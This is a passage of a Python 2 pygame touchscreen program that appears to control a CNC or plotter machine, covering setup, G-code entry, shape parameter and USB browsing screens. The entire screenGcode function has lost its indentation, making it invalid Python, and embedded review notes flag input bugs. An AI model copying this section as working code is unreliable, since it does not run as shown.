            pygame.display.update()
        FPSCLOCK.tick(300)
        screenNeedsRedraw = False # by default, don't redraw the screen
        event = pygame.event.wait()
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
        elif event.type == KEYUP:
            if event.key == K_ESCAPE:
                pygame.quit()
                sys.exit()
        elif event.type == MOUSEBUTTONUP:
            screenNeedsRedraw = True # screen should be redrawn
            mousex, mousey = event.pos # syntactic sugar
            # check for clicks on the shape buttons
            if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
                print 'SHAPES CIRCLE'
                screenSetsh('cir')
            elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
                print 'SHAPES RECTANGLE'
                screenSetsh('rec')
            elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
                print 'SHAPES STAR'
                screenSetsh('sta')
            elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
                print 'SHAPES BLANK'
            elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
                print 'SHAPES RHOMBUS'
                screenSetsh('rho')
            elif pygame.Rect((BUTTON6s)).collidepoint(mousex, mousey):
                print 'SHAPES TRIANGLE'
                screenSetsh('tri')
            elif pygame.Rect((BUTTON7s)).collidepoint(mousex, mousey):
                print 'SHAPES POLYGON'
                screenSetsh('pol')
            elif pygame.Rect((BUTTON8s)).collidepoint(mousex, mousey):
                print 'SHAPES BLANK'
            elif pygame.Rect((BUTTON9s)).collidepoint(mousex, mousey):
                print 'SHAPES BLANK'
            elif pygame.Rect((BUTTON10s)).collidepoint(mousex, mousey):
                print 'SHAPES BLANK'
            elif pygame.Rect((BUTTON11s)).collidepoint(mousex, mousey):
                print 'SHAPES BLANK'
            elif pygame.Rect((BUTTON12s)).collidepoint(mousex, mousey):
                print 'SHAPES CANCEL'
                screenHome()
            pygame.display.update()
def screenSetup():
    """Setup screen: edit five machine settings with UP/DOWN/+/-.

    Rows 0-3 are numeric values (clamped to setrMn/setrMx); row 4
    toggles the unit between 'mm' and 'inch'.  DONE writes the values
    with printset() and rebuilds gdecode.exe so the new settings take
    effect, then returns to the home screen.
    """
    # Setup screen to change settings.
    global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
    image_file = os.path.join(main_dir, 'data', 'setup.png')
    SIMAGE = pygame.image.load(image_file)
    DISPLAYSURF.blit(SIMAGE, (0, 0))
    BUTTON1 = (630,0,170,114)
    BUTTON1s = [630,0,170,114]
    BUTTON2 = (630,121,170,114)
    BUTTON2s = [630,121,170,114]
    BUTTON3 = (630,242,170,114)
    BUTTON3s = [630,242,170,114]
    BUTTON4 = (630,366,170,114)
    BUTTON4s = [630,366,170,114]
    BUTTON5 = (630,488,170,114)
    BUTTON5s = [630,488,170,114]
    screenNeedsRedraw = True
    if XINV == True:
        BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
        BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
        BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
        BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
        BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
    if YINV == True:
        BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
        BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
        BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
        BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
        BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
    setting = getset()
    set4 = ['mm', 'inch']
    # colbac[i]: row highlight colour ('NO' = none, ABLUE = selected).
    colbac=[ABLUE, 'NO', 'NO', 'NO', 'NO']
    selset = 0
    # Per-row max/min limits for the numeric settings.
    setrMx=[23, 23, 15, 15, 1]
    setrMn=[0, 0, 0, 0, 0]
    # NOTE(review): row 0 is the initial selection (colbac[0]=ABLUE)
    # yet this first render passes 'NO' instead of colbac[0] -- the
    # highlight only appears after the first event; confirm intent.
    showtext(DISPLAYSURF, (440, 30), setting[0], COLOR_OFF, 'NO')
    showtext(DISPLAYSURF, (440,100), setting[1], COLOR_OFF, colbac[1])
    showtext(DISPLAYSURF, (440,170), setting[2], COLOR_OFF, colbac[2])
    showtext(DISPLAYSURF, (440,240), setting[3], COLOR_OFF, colbac[3])
    showtext(DISPLAYSURF, (440,310), set4[int(setting[4])], COLOR_OFF, colbac[4])
    while True:
        if screenNeedsRedraw:
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON1,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON2,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON3,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON4,2)
            pygame.draw.rect(DISPLAYSURF,COLOR_OFF,BUTTON5,2)
            pygame.display.update()
        FPSCLOCK.tick(300)
        screenNeedsRedraw = False # by default, don't redraw the screen
        event = pygame.event.wait()
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
        elif event.type == KEYUP:
            if event.key == K_ESCAPE:
                pygame.quit()
                sys.exit()
        elif event.type == MOUSEBUTTONUP:
            screenNeedsRedraw = True # screen should be redrawn
            mousex, mousey = event.pos # syntactic sugar
            # UP: move selection to the previous row (wraps 0 -> 4)
            if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
                colbac[selset]='NO'
                if(selset==0):
                    selset=5
                selset-=1;
                colbac[selset]=ABLUE
                DISPLAYSURF.blit(SIMAGE, (0, 0))
                print 'SETUP UP'
            elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
                # ADD: increment the selected value up to its max.
                if(int(setting[selset])<setrMx[selset]):
                    setting[selset]=str(int(setting[selset])+1);
                print 'SETUP ADD'
            elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
                # SUB: decrement the selected value down to its min.
                if(int(setting[selset])>setrMn[selset]):
                    setting[selset]=str(int(setting[selset])-1);
                print 'SETUP SUB'
            elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
                # DOWN: move selection to the next row (wraps 4 -> 0)
                colbac[selset]='NO'
                if(selset==4):
                    selset=-1
                selset+=1;
                colbac[selset]=ABLUE
                DISPLAYSURF.blit(SIMAGE, (0, 0))
                print 'SETUP DOWN'
            elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
                # DONE: persist settings and rebuild the gcode decoder.
                printset(setting)
                os.system('g++ -I . gdecode.cpp -o gdecode.exe')
                print 'SETUP DONE'
                screenHome()
            #setting[0]=str(int(setting[0])+1);
            # Redraw the highlight bar and all five value rows.
            pygame.draw.rect(DISPLAYSURF,ABLUE,(362,21+71*selset,243,36),0)
            showtext(DISPLAYSURF, (440, 30), setting[0], COLOR_OFF, colbac[0])
            showtext(DISPLAYSURF, (440,100), setting[1], COLOR_OFF, colbac[1])
            showtext(DISPLAYSURF, (440,170), setting[2], COLOR_OFF, colbac[2])
            showtext(DISPLAYSURF, (440,240), setting[3], COLOR_OFF, colbac[3])
            showtext(DISPLAYSURF, (440,310), set4[int(setting[4])], COLOR_OFF, colbac[4])
            pygame.display.update()
def screenGcode():
#Gcode screen to creat custom gcode
global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
image_file = os.path.join(main_dir, 'data', 'gcode.png')
SIMAGE = pygame.image.load(image_file)
DISPLAYSURF.blit(SIMAGE, (0, 0))
#X
BUTTON1s = [9,365,96,74]
#I
BUTTON2s = [112,365,96,74]
#1
BUTTON3s = [216,365,96,74]
#2
BUTTON4s = [320,365,96,74]
#3
BUTTON5s = [423,365,96,74]
#0
BUTTON6s = [527,365,96,74]
#Y
BUTTON7s = [9,446,96,74]
#J
BUTTON8s = [112,446,96,74]
#4
BUTTON9s = [216,446,96,74]
#5
BUTTON10s = [320,446,96,74]
#6
BUTTON11s = [423,446,96,74]
#.
BUTTON12s = [527,446,96,74]
#Z
BUTTON13s = [9,525,96,74]
#K
BUTTON14s = [112,525,96,74]
#7
BUTTON15s = [216,525,96,74]
#8
BUTTON16s = [320,525,96,74]
#9
BUTTON17s = [423,525,96,74]
#-
BUTTON18s = [527,525,96,74]
#Next
BUTTON19s = [630,365,170,114]
#Done
BUTTON20s = [630,487,170,114]
screenNeedsRedraw = True
if XINV == True:
BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
BUTTON6s[0] = WINDOWWIDTH - BUTTON6s[0] - BUTTON6s[2]
BUTTON7s[0] = WINDOWWIDTH - BUTTON7s[0] - BUTTON7s[2]
BUTTON8s[0] = WINDOWWIDTH - BUTTON8s[0] - BUTTON8s[2]
BUTTON9s[0] = WINDOWWIDTH - BUTTON9s[0] - BUTTON9s[2]
BUTTON10s[0] = WINDOWWIDTH - BUTTON10s[0] - BUTTON10s[2]
BUTTON11s[0] = WINDOWWIDTH - BUTTON11s[0] - BUTTON11s[2]
BUTTON12s[0] = WINDOWWIDTH - BUTTON12s[0] - BUTTON12s[2]
BUTTON13s[0] = WINDOWWIDTH - BUTTON13s[0] - BUTTON13s[2]
BUTTON14s[0] = WINDOWWIDTH - BUTTON14s[0] - BUTTON14s[2]
BUTTON15s[0] = WINDOWWIDTH - BUTTON15s[0] - BUTTON15s[2]
BUTTON16s[0] = WINDOWWIDTH - BUTTON16s[0] - BUTTON16s[2]
BUTTON17s[0] = WINDOWWIDTH - BUTTON17s[0] - BUTTON17s[2]
BUTTON18s[0] = WINDOWWIDTH - BUTTON18s[0] - BUTTON18s[2]
BUTTON19s[0] = WINDOWWIDTH - BUTTON19s[0] - BUTTON19s[2]
BUTTON20s[0] = WINDOWWIDTH - BUTTON20s[0] - BUTTON20s[2]
if YINV == True:
BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
BUTTON6s[1] = WINDOWHEIGHT - BUTTON6s[1] - BUTTON6s[3]
BUTTON7s[1] = WINDOWHEIGHT - BUTTON7s[1] - BUTTON7s[3]
BUTTON8s[1] = WINDOWHEIGHT - BUTTON8s[1] - BUTTON8s[3]
BUTTON9s[1] = WINDOWHEIGHT - BUTTON9s[1] - BUTTON9s[3]
BUTTON10s[1] = WINDOWHEIGHT - BUTTON10s[1] - BUTTON10s[3]
BUTTON11s[1] = WINDOWHEIGHT - BUTTON11s[1] - BUTTON11s[3]
BUTTON12s[1] = WINDOWHEIGHT - BUTTON12s[1] - BUTTON12s[3]
BUTTON13s[1] = WINDOWHEIGHT - BUTTON13s[1] - BUTTON13s[3]
BUTTON14s[1] = WINDOWHEIGHT - BUTTON14s[1] - BUTTON14s[3]
BUTTON15s[1] = WINDOWHEIGHT - BUTTON15s[1] - BUTTON15s[3]
BUTTON16s[1] = WINDOWHEIGHT - BUTTON16s[1] - BUTTON16s[3]
BUTTON17s[1] = WINDOWHEIGHT - BUTTON17s[1] - BUTTON17s[3]
BUTTON18s[1] = WINDOWHEIGHT - BUTTON18s[1] - BUTTON18s[3]
BUTTON19s[1] = WINDOWHEIGHT - BUTTON19s[1] - BUTTON19s[3]
BUTTON20s[1] = WINDOWHEIGHT - BUTTON20s[1] - BUTTON20s[3]
wpath = os.path.join(main_dir, "gcode", "wgcode.txt" )
gpath = os.path.join(main_dir, "gcode", "gcode.txt" )
cpwg = 'cp '+ wpath + ' ' + gpath
os.system("rm -f ./gcode/wgcode.txt")
gline="G"
showtextr(DISPLAYSURF, (30, 300), 0, gline, COLOR_OFF, ABLUE)
while True:
if screenNeedsRedraw:
pygame.display.update()
FPSCLOCK.tick(300)
screenNeedsRedraw = False # by default, don't redraw the screen
event = pygame.event.wait()
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
elif event.type == MOUSEBUTTONUP:
screenNeedsRedraw = True # screen should be redrawn
mousex, mousey = event.pos # syntactic sugar
# check for clicks on the difficulty buttons
if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
gline+=' X'
print 'GCODE X'
elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
gline+=' I'
print 'GCODE I'
elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
gline+='1'
print 'GCODE 1'
elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
gline+='2'
print 'GCODE 2'
elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
gline+='3'
print 'GCODE 3'
elif pygame.Rect((BUTTON6s)).collidepoint(mousex, mousey):
gline+='0'
print 'GCODE 0'
elif pygame.Rect((BUTTON7s)).collidepoint(mousex, mousey):
gline+=' Y'
print 'GCODE Y'
elif pygame.Rect((BUTTON8s)).collidepoint(mousex, mousey):
gline+=' J'
print 'GCODE J'
elif pygame.Rect((BUTTON9s)).collidepoint(mousex, mousey):
gline+='4'
print 'GCODE 4'
elif pygame.Rect((BUTTON10s)).collidepoint(mousex, mousey):
gline+='5'
print 'GCODE 5'
elif pygame.Rect((BUTTON11s)).collidepoint(mousex, mousey):
gline+='6'
print 'GCODE 6'
elif pygame.Rect((BUTTON12s)).collidepoint(mousex, mousey):
gline+='.'
print 'GCODE .'
elif pygame.Rect((BUTTON13s)).collidepoint(mousex, mousey):
gline+=' Z'
print 'GCODE Z'
elif pygame.Rect((BUTTON14s)).collidepoint(mousex, mousey):
gline+=' K'
print 'GCODE K'
elif pygame.Rect((BUTTON15s)).collidepoint(mousex, mousey):
gline+='7'
print 'GCODE 7'
elif pygame.Rect((BUTTON16s)).collidepoint(mousex, mousey):
gline+='8'
print 'GCODE 8'
elif pygame.Rect((BUTTON17s)).collidepoint(mousex, mousey):
gline+='9'
print 'GCODE 9'
elif pygame.Rect((BUTTON18s)).collidepoint(mousex, mousey):
gline+='-'
print 'GCODE -'
elif pygame.Rect((BUTTON19s)).collidepoint(mousex, mousey):
gline+='\n'
wline(wpath, gline)
gline="G"
filelines(30, 50, wpath, 0, 10, 45, 0)
showtextr(DISPLAYSURF, (30, 300), 0, " ", COLOR_OFF, ABLUE)
print 'GCODE NEXT'
elif pygame.Rect((BUTTON20s)).collidepoint(mousex, mousey):
wline(wpath, "END")
os.system(cpwg)
gdc_file = os.path.join(main_dir,'gdecode.exe' )
os.system(gdc_file)
dstx,dsty,dscale=getscale(590,540)
get_stpz(dstx,dsty,dscale)
print 'GCODE DONE'
screenHome()
showtextr(DISPLAYSURF, (30, 300), 0, gline, COLOR_OFF, ABLUE)
pygame.display.update()
def screenSetsh(shape):
    """Parameter-entry screen for one predefined shape.

    shape is one of 'cir', 'rec', 'sta', 'rho', 'tri', 'pol'; it
    selects the background image, the per-shape .set value files
    (current / max / min), and where each editable value is drawn
    (pos) and at what rotation (rot).  The numeric keypad edits the
    currently selected value; DONE clamps it, generates G-code for
    the shape, runs gdecode.exe and returns to the home screen.
    """
    # Screen for setting each shape.
    global difficulty, boxSize, boardWidth, boardHeight, maxLife, paletteColors, bgColor
    global dstx,dsty,dscale
    if shape == 'cir':
        image_file = os.path.join(main_dir, 'data', 'setcir.png')
        setting = getshset(os.path.join('gcode' ,'circle.set'))
        setrMx = getshset(os.path.join('gcode' ,'circleMx.set'))
        setrMn = getshset(os.path.join('gcode' ,'circleMn.set'))
        pos = [(230, 250)]
        rot = [0]
    elif shape == 'rec':
        image_file = os.path.join(main_dir, 'data', 'setrec.png')
        setting = getshset(os.path.join('gcode' ,'rect.set'))
        setrMx = getshset(os.path.join('gcode' ,'rectMx.set'))
        setrMn = getshset(os.path.join('gcode' ,'rectMn.set'))
        pos = [(240, 412), (50, 250)]
        rot = [0, 90]
    elif shape == 'sta':
        image_file = os.path.join(main_dir, 'data', 'setsta.png')
        setting = getshset(os.path.join('gcode' ,'star.set'))
        setrMx = getshset(os.path.join('gcode' ,'starMx.set'))
        setrMn = getshset(os.path.join('gcode' ,'starMn.set'))
        pos = [(50, 90), (265, 254),(190, 200)]
        rot = [0, 0, -45]
    elif shape == 'rho':
        image_file = os.path.join(main_dir, 'data', 'setrho.png')
        setting = getshset(os.path.join('gcode' ,'rhom.set'))
        setrMx = getshset(os.path.join('gcode' ,'rhomMx.set'))
        setrMn = getshset(os.path.join('gcode' ,'rhomMn.set'))
        pos = [(225, 412), (255, 250)]
        rot = [0, 90]
    elif shape == 'tri':
        image_file = os.path.join(main_dir, 'data', 'settri.png')
        setting = getshset(os.path.join('gcode' ,'tri.set'))
        setrMx = getshset(os.path.join('gcode' ,'triMx.set'))
        setrMn = getshset(os.path.join('gcode' ,'triMn.set'))
        pos = [(230, 417), (266, 250), (180, 350) ]
        rot = [0, 90, 0]
    elif shape == 'pol':
        image_file = os.path.join(main_dir, 'data', 'setpol.png')
        setting = getshset(os.path.join('gcode' ,'poly.set'))
        setrMx = getshset(os.path.join('gcode' ,'polyMx.set'))
        setrMn = getshset(os.path.join('gcode' ,'polyMn.set'))
        pos = [(50, 90), (165, 170)]
        rot = [0, -45]
    SIMAGE = pygame.image.load(image_file)
    DISPLAYSURF.blit(SIMAGE, (0, 0))
    # Keypad hit-test rects (mirrored below when axes are inverted).
    #1
    BUTTON1s = [515,46,92,74]
    #2
    BUTTON2s = [610,46,92,74]
    #3
    BUTTON3s = [704,46,92,74]
    #4
    BUTTON4s = [515,123,92,75]
    #5
    BUTTON5s = [610,123,92,75]
    #6
    BUTTON6s = [704,123,92,75]
    #7
    BUTTON7s = [515,201,92,74]
    #8
    BUTTON8s = [610,201,92,74]
    #9
    BUTTON9s = [704,201,92,74]
    #0
    BUTTON10s = [610,277,92,74]
    #.
    BUTTON11s = [704,277,92,74]
    #DEC
    BUTTON12s = [515,355,136,159]
    #INC
    BUTTON13s = [654,355,142,159]
    #PREVIOUS
    BUTTON14s = [7,518,254,77]
    #NEXT
    BUTTON15s = [267,518,243,77]
    #DONE
    BUTTON16s = [514,517,281,78]
    screenNeedsRedraw = True
    if XINV == True:
        BUTTON1s[0] = WINDOWWIDTH - BUTTON1s[0] - BUTTON1s[2]
        BUTTON2s[0] = WINDOWWIDTH - BUTTON2s[0] - BUTTON2s[2]
        BUTTON3s[0] = WINDOWWIDTH - BUTTON3s[0] - BUTTON3s[2]
        BUTTON4s[0] = WINDOWWIDTH - BUTTON4s[0] - BUTTON4s[2]
        BUTTON5s[0] = WINDOWWIDTH - BUTTON5s[0] - BUTTON5s[2]
        BUTTON6s[0] = WINDOWWIDTH - BUTTON6s[0] - BUTTON6s[2]
        BUTTON7s[0] = WINDOWWIDTH - BUTTON7s[0] - BUTTON7s[2]
        BUTTON8s[0] = WINDOWWIDTH - BUTTON8s[0] - BUTTON8s[2]
        BUTTON9s[0] = WINDOWWIDTH - BUTTON9s[0] - BUTTON9s[2]
        BUTTON10s[0] = WINDOWWIDTH - BUTTON10s[0] - BUTTON10s[2]
        BUTTON11s[0] = WINDOWWIDTH - BUTTON11s[0] - BUTTON11s[2]
        BUTTON12s[0] = WINDOWWIDTH - BUTTON12s[0] - BUTTON12s[2]
        BUTTON13s[0] = WINDOWWIDTH - BUTTON13s[0] - BUTTON13s[2]
        BUTTON14s[0] = WINDOWWIDTH - BUTTON14s[0] - BUTTON14s[2]
        BUTTON15s[0] = WINDOWWIDTH - BUTTON15s[0] - BUTTON15s[2]
        BUTTON16s[0] = WINDOWWIDTH - BUTTON16s[0] - BUTTON16s[2]
    if YINV == True:
        BUTTON1s[1] = WINDOWHEIGHT - BUTTON1s[1] - BUTTON1s[3]
        BUTTON2s[1] = WINDOWHEIGHT - BUTTON2s[1] - BUTTON2s[3]
        BUTTON3s[1] = WINDOWHEIGHT - BUTTON3s[1] - BUTTON3s[3]
        BUTTON4s[1] = WINDOWHEIGHT - BUTTON4s[1] - BUTTON4s[3]
        BUTTON5s[1] = WINDOWHEIGHT - BUTTON5s[1] - BUTTON5s[3]
        BUTTON6s[1] = WINDOWHEIGHT - BUTTON6s[1] - BUTTON6s[3]
        BUTTON7s[1] = WINDOWHEIGHT - BUTTON7s[1] - BUTTON7s[3]
        BUTTON8s[1] = WINDOWHEIGHT - BUTTON8s[1] - BUTTON8s[3]
        BUTTON9s[1] = WINDOWHEIGHT - BUTTON9s[1] - BUTTON9s[3]
        BUTTON10s[1] = WINDOWHEIGHT - BUTTON10s[1] - BUTTON10s[3]
        BUTTON11s[1] = WINDOWHEIGHT - BUTTON11s[1] - BUTTON11s[3]
        BUTTON12s[1] = WINDOWHEIGHT - BUTTON12s[1] - BUTTON12s[3]
        BUTTON13s[1] = WINDOWHEIGHT - BUTTON13s[1] - BUTTON13s[3]
        BUTTON14s[1] = WINDOWHEIGHT - BUTTON14s[1] - BUTTON14s[3]
        BUTTON15s[1] = WINDOWHEIGHT - BUTTON15s[1] - BUTTON15s[3]
        BUTTON16s[1] = WINDOWHEIGHT - BUTTON16s[1] - BUTTON16s[3]
    loopb = True
    # setting[0] appears to hold an element count; shift it off so
    # setting[k] is the k-th editable value (same for the limits).
    count = int(setting[0])-1;
    setting[0:count] = setting[1:count]
    setrMx[0:count] = setrMx[1:count]
    setrMn[0:count] = setrMn[1:count]
    print count
    colbac=['NO','NO', 'NO', 'NO', 'NO', 'NO']
    selset = 0
    # mode 0 = next digit replaces the value; 1 = digits are appended.
    mode = 0
    setint=[0]*count
    for k in range(count):
        showtextr(DISPLAYSURF, pos[k], rot[k], str(int(setting[k])), COLOR_OFF, colbac[k])
        setint[k]=int(setting[k])
    while loopb:
        if screenNeedsRedraw:
            pygame.display.update()
        FPSCLOCK.tick(300)
        screenNeedsRedraw = False # by default, don't redraw the screen
        event = pygame.event.wait()
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
        elif event.type == KEYUP:
            if event.key == K_ESCAPE:
                pygame.quit()
                sys.exit()
        elif event.type == MOUSEBUTTONUP:
            screenNeedsRedraw = True # screen should be redrawn
            mousex, mousey = event.pos # syntactic sugar
            # Digit keys: erase the old value (draw in background
            # colour), then replace or append the digit per `mode`.
            if pygame.Rect((BUTTON1s)).collidepoint(mousex, mousey):
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                if(mode==0):
                    setting[selset]='1'
                    mode=1
                else:
                    setting[selset]=setting[selset]+'1'
                print 'SETSH 1'
            elif pygame.Rect((BUTTON2s)).collidepoint(mousex, mousey):
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                if(mode==0):
                    setting[selset]='2'
                    mode=1
                else:
                    setting[selset]=setting[selset]+'2'
                print 'SETSH 2'
            elif pygame.Rect((BUTTON3s)).collidepoint(mousex, mousey):
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                if(mode==0):
                    setting[selset]='3'
                    mode=1
                else:
                    setting[selset]=setting[selset]+'3'
                print 'SETSH 3'
            elif pygame.Rect((BUTTON4s)).collidepoint(mousex, mousey):
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                if(mode==0):
                    setting[selset]='4'
                    mode=1
                else:
                    setting[selset]=setting[selset]+'4'
                print 'SETSH 4'
            elif pygame.Rect((BUTTON5s)).collidepoint(mousex, mousey):
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                if(mode==0):
                    setting[selset]='5'
                    mode=1
                else:
                    setting[selset]=setting[selset]+'5'
                print 'SETSH 5'
            elif pygame.Rect((BUTTON6s)).collidepoint(mousex, mousey):
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                if(mode==0):
                    setting[selset]='6'
                    mode=1
                else:
                    setting[selset]=setting[selset]+'6'
                print 'SETSH 6'
            elif pygame.Rect((BUTTON7s)).collidepoint(mousex, mousey):
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                if(mode==0):
                    setting[selset]='7'
                    mode=1
                else:
                    setting[selset]=setting[selset]+'7'
                print 'SETSH 7'
            elif pygame.Rect((BUTTON8s)).collidepoint(mousex, mousey):
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                if(mode==0):
                    setting[selset]='8'
                    mode=1
                else:
                    setting[selset]=setting[selset]+'8'
                print 'SETSH 8'
            elif pygame.Rect((BUTTON9s)).collidepoint(mousex, mousey):
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                if(mode==0):
                    setting[selset]='9'
                    mode=1
                else:
                    setting[selset]=setting[selset]+'9'
                print 'SETSH 9'
            elif pygame.Rect((BUTTON10s)).collidepoint(mousex, mousey):
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                if(mode==0):
                    setting[selset]='0'
                    mode=1
                else:
                    setting[selset]=setting[selset]+'0'
                print 'SETSH 0'
            elif pygame.Rect((BUTTON11s)).collidepoint(mousex, mousey):
                # '.' key slot: actually toggles the sign of the value.
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                setting[selset]= str(-1*int(setting[selset]))
                print 'SETSH .'
            elif pygame.Rect((BUTTON12s)).collidepoint(mousex, mousey):
                # DEC: step the value down, not below its minimum.
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                mode=0
                if(int(setting[selset])>int(setrMn[selset])):
                    setting[selset]=str(int(setting[selset])-1);
                colbac[selset]=ABLUE
                print 'SETSH DEC'
            elif pygame.Rect((BUTTON13s)).collidepoint(mousex, mousey):
                # INC: step the value up, not above its maximum.
                showtextr(DISPLAYSURF, pos[selset], rot[selset], setting[selset], ABLUE, ABLUE)
                mode=0
                if(int(setting[selset])<int(setrMx[selset])):
                    setting[selset]=str(int(setting[selset])+1);
                colbac[selset]=ABLUE
                print 'SETSH INC'
            elif pygame.Rect((BUTTON14s)).collidepoint(mousex, mousey):
                # PREVIOUS: select the previous value (wraps around).
                colbac[selset]='NO'
                mode=0
                if(selset==0):
                    selset=count
                selset-=1;
                colbac[selset]=ABLUE
                DISPLAYSURF.blit(SIMAGE, (0, 0))
                print 'SETSH PREVIOUS'
            elif pygame.Rect((BUTTON15s)).collidepoint(mousex, mousey):
                # NEXT: select the next value (wraps around).
                colbac[selset]='NO'
                mode=0
                if(selset==count-1):
                    selset=-1
                selset+=1;
                colbac[selset]=ABLUE
                DISPLAYSURF.blit(SIMAGE, (0, 0))
                print 'SETSH NEXT'
            elif pygame.Rect((BUTTON16s)).collidepoint(mousex, mousey):
                print 'SETSH OK'
                loopb = False
            # Clamp the selected value into [min, max] after each event.
            if((int(setting[selset])<int(setrMn[selset])) and (mode == 0)):
                setting[selset]=setrMn[selset]
            if(int(setting[selset])>int(setrMx[selset])):
                setting[selset]=setrMx[selset]
            # NOTE(review): mode is reset after *every* event here,
            # which appears to defeat multi-digit entry (a second
            # digit press replaces rather than appends) -- confirm.
            mode=0
            print setting[selset]
            for k in range(count):
                showtextr(DISPLAYSURF, pos[k], rot[k], str(int(setting[k])), COLOR_OFF, colbac[k])
                setint[k]=int(setting[k])
            pygame.display.update()
    # Generate G-code for the chosen shape, install it as gcode.txt,
    # regenerate the motion/preview data, and return home.
    d_file = os.path.join(main_dir, 'gcode', 'gcode.txt')
    if shape == 'cir':
        s_file = os.path.join(main_dir, 'gcode', 'circle.txt')
        circle2g(setint)
    elif shape == 'rec':
        rectangle2g(setint)
        s_file = os.path.join(main_dir, 'gcode', 'rect.txt')
    elif shape == 'sta':
        star2g(setint)
        s_file = os.path.join(main_dir, 'gcode', 'star.txt')
    elif shape == 'rho':
        rhombus2g(setint)
        s_file = os.path.join(main_dir, 'gcode', 'rhom.txt')
    elif shape == 'tri':
        triangle2g(setint)
        s_file = os.path.join(main_dir, 'gcode', 'tri.txt')
    elif shape == 'pol':
        polygon2g(setint)
        s_file = os.path.join(main_dir, 'gcode', 'poly.txt')
    #TODO cp <-> copy
    comm = 'cp '+ s_file + ' ' + d_file
    os.system(comm)
    gdc_file = os.path.join(main_dir,'gdecode.exe' )
    os.system(gdc_file)
    dstx,dsty,dscale=getscale(590,540)
    get_stpz(dstx,dsty,dscale)
    screenHome()
def screenUsb():
    """USB browser screen: navigate a mounted USB stick and pick a design
    file, or cancel back to the home screen (Python 2 / pygame)."""
    # This screen writes the scaled drawing origin/scale back into globals.
    global dstx,dsty,dscale
    image_file = os.path.join(main_dir, 'data', 'usb.png')
    SIMAGE = pygame.image.load(image_file)
    DISPLAYSURF.blit(SIMAGE, (0, 0))
    # BUTTONn is the rect drawn on screen; BUTTONns is the (possibly
    # mirrored) hit-box list used for click detection.
    BUTTON1 = (630,0,170,114)
    BUTTON1s = [630,0,170,114]
    BUTTON2 = (630,121,170,114)
    BUTTON2s = [630,121,170,114]
    BUTTON3 = (630,242,170,114)
    BUTTON3s = [630,242,170,114]
    BUTTON4 = (630,366,170,114)
    BUTTON4s = [630,366,170,114]
